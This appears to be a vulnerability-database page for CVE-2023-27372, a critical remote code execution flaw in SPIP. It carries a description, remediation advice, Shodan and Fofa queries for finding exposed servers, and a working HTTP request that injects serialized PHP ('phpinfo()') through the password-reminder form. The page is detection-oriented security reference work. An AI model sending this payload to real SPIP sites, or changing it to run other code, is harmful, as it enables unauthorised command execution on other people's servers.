🔙 목록으로 돌아가기

CVE-2023-27372: SPIP - Remote Command Execution

TitleSPIP - Remote Command Execution
AuthorDhiyaneshDK,nuts7
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the target system.
RemediationApply the latest security patches or upgrade to a patched version of SPIP.
CVSS Score9.8
EPSS Score0.93378
CVE IDCVE-2023-27372
Shodan Queryhtml:"spip.php?page=backend"http.html:"spip.php?page=backend"cpe:"cpe:2.3:a:spip:spip"
Fofa Querybody="spip.php?page=backend"
Tags cve cve2023 packetstorm spip rce vkev vuln

🔍 Vulnerability Description

SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.

🌐 HTTP Request

GET /spip.php?page=spip_pass HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
POST /spip.php?page=spip_pass HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/13.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

page=spip_pass&formulaire_action=oubli&formulaire_action_args=yfhrqh&oubli=s:19:"<?php phpinfo(); ?>";

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-27372.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-27372.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A